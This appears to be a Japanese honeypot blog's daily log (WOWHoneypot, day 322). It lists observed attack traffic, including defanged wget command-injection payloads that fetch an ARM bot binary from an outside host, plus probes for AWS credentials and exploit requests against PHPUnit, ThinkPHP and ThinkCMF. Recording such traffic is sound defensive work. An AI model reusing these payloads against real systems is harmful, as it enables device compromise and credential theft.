23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(322日目)

2020/02/02(日)

トータルは269件でした。

ハンティングログは以下です。

46.166.187[.]111 wget${IFS}hxxp[:]//82.223.101.182/.t/80/arm7
89.248.174[.]146 wget${IFS}hxxp[:]//82.223.101.182/.t/80/arm7
89.248.174[.]146 wget${IFS}hxxp[:]//82.223.101.182/.t/80/arm7

www.virustotal.com
www.virustotal.com

件数 概要 リクエス
163 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
44 調査 GET /script
35 アクセス GET /
6 調査 GET /is_test
5 AWSの認証情報の調査 GET /.aws/credentials
3 DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 POST /editBlackAndWhiteList
1 PHPUnit脆弱性(CVE-2017-9841)を狙った通信 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
1 GPONルーターの調査 POST /GponForm/diag_Form?images/
1 Solrの調査 GET /solr/admin/info/system?wt=json
1 phpMyAdminの調査 GET /pma/scripts/setup.php
1 phpMyAdminの調査 GET /phpMyAdmin/scripts/setup.php
1 phpMyAdminの調査 GET /myadmin/scripts/setup.php
1 調査 GET /logs
1 ThinkPHPの脆弱性を狙った通信 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
1 phpMyAdminの調査 GET /admin-scripts.asp
1 不明 GET /?f=search&m=index&keyword=aaa%2527%256F%2572%2520%2575%2570%2564%2561%2574%2565%2578%256D%256C%2528%2531%252C%2563%256F%256E%2563%2561%2574%2528%2531%252C%256D%2564%2535%2528%2531%2529%2529%252C%2531%2529%2523
1 ThinkCMFの脆弱性を狙った通信 GET /?a=fetch&content=die(@md5(HelloThinkCMF))
1 リモートデバッグの調査 GET /?XDEBUG_SESSION_START=phpstorm
1 不正中継の試み CONNECT ip.ws.126.net:443